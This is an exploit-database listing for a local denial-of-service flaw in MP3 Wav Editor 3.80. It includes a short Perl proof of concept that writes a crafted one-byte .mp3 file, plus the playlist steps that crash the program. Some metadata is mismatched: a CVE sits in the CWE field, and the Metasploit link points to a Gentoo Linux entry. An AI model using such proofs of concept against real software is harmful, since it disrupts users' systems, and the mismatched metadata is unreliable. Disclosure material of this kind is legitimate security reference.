header-logo
Suggest Exploit
vendor:
MP3 Wav Editor
by:
anonymous
7,8
CVSS
HIGH
DoS
119
CWE
Product Name: MP3 Wav Editor
Affected Version From: 3.80
Affected Version To: 3.80
Patch Exists: Yes
Related CWE: CVE-2010-1445
CPE: a:mp3waveditor:mp3_wav_editor:3.80
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2010-1445/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

MP3WavEditor Local DoS .mp3

A local denial of service vulnerability exists in MP3 Wav Editor 3.80. An attacker can create a specially crafted .mp3 file, which when added to a playlist and deleted, causes the application to crash.

Mitigation:

Upgrade to version 3.81 or later.
Source

Exploit-DB raw data:

# Exploit Title: MP3WavEditor Local DoS .mp3
# Date: April 5, 2010
# Software Link: [http://www.mp3waveditor.com/index.htm]
# Version: 3.80
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#
#!/usr/bin/perl

my $file = "yawn.mp3";
my $_a = "\x41";

open (FILE, ">$file");
print FILE "$_a";

print "Usage: Make playlist -> Add mp3 -> Delete Playlist -> Recreate same playlist\n";

Navigation

Suggest Exploit

Services By CQR